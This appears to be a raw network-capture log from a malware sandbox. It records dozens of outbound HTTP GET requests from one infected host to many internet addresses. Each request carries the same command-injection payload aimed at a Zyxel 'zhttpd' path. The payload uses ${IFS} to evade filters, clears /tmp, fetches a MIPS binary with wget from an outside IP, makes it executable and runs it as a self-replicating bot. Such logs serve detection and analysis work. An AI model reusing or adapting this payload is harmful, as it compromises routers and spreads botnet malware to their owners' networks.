                                          Jan 14, 2024 15:46:05.786851883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1817192.168.2.2357874208.83.187.50443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.786886930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1818192.168.2.2351052130.14.84.29443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.786895990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1819192.168.2.2355592209.178.55.158443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.786981106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1820192.168.2.23370029.197.96.201443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.787003040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1821192.168.2.235426224.208.224.30443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.787017107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1822192.168.2.2337290115.214.245.173443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.787061930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1823192.168.2.23564122.95.143.216443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.787131071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1824192.168.2.2348216209.210.76.243443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.787153006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1825192.168.2.234033057.61.175.40443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.787178040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1826192.168.2.2356076182.253.96.20443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.787214994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1827192.168.2.233530666.180.87.149443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.787244081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1828192.168.2.2340936135.69.72.253443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.787254095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1829192.168.2.2339022185.61.104.17443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.787308931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1830192.168.2.234149044.20.229.210443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.787324905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1831192.168.2.2339460155.29.172.228443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.787363052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1832192.168.2.2349020132.177.5.165443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.787391901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1833192.168.2.2340124145.95.65.225443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.787445068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1834192.168.2.235736283.139.23.223443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.787451982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1835192.168.2.2354538212.113.155.55443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.787482023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1836192.168.2.2358332197.107.240.93443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.787544012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1837192.168.2.2346986178.36.119.212443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.787575960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1838192.168.2.2345692206.215.182.246443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.787616968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1839192.168.2.233937496.210.61.172443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.787693977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1840192.168.2.2339788168.123.25.255443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.787699938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1841192.168.2.2344620109.126.248.1443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.787734032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1842192.168.2.2332788199.195.138.17443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.787759066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1843192.168.2.2353722156.243.127.153443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.787815094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1844192.168.2.2336770165.219.159.61443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.787828922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1845192.168.2.235099664.13.253.226443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.787877083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1846192.168.2.234670295.195.57.39443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.787888050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1847192.168.2.234467224.80.24.180443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.787939072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1848192.168.2.2348710197.245.59.93443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.787955046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1849192.168.2.234742086.135.45.73443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.787992954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1850192.168.2.2346222210.177.53.154443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.788052082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1851192.168.2.2353522164.139.80.201443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.788069963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1852192.168.2.23419604.158.216.239443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.788104057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1853192.168.2.234428017.250.190.200443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.788149118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1854192.168.2.235090061.64.80.56443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.788162947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1855192.168.2.233397423.166.237.106443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.788194895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1856192.168.2.234570090.165.91.50443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.788260937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1857192.168.2.2359204221.82.246.31443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.788289070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1858192.168.2.234201245.54.68.81443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.788322926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1859192.168.2.235990269.154.172.5443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.788362980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1860192.168.2.2341546108.196.230.224443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.788368940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1861192.168.2.2346870219.94.115.7443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.788413048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1862192.168.2.2342734193.231.133.80443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.788464069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1863192.168.2.2342802115.239.191.70443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.788491011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1864192.168.2.234849464.227.17.156443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.788522005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1865192.168.2.234601032.57.225.193443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.788588047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1866192.168.2.2358060120.56.72.39443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.788629055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1867192.168.2.233625654.193.217.3443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.788655043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1868192.168.2.23491085.25.183.16443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.788685083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1869192.168.2.233895419.255.164.137443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.788722038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1870192.168.2.234584048.85.30.128443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.788747072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1871192.168.2.2345802134.100.119.93443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.788780928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1872192.168.2.2348568216.115.229.253443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.788851023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1873192.168.2.235749296.170.70.179443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.788880110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1874192.168.2.2357252126.93.37.4443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.788917065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1875192.168.2.2352202143.153.53.58443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.788959026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1876192.168.2.233604225.106.248.188443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.788986921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1877192.168.2.234696492.133.46.61443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.789016008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1878192.168.2.235825690.171.125.128443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.789063931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1879192.168.2.234322246.237.116.16443
                                          TimestampBytes transferredDirectionData
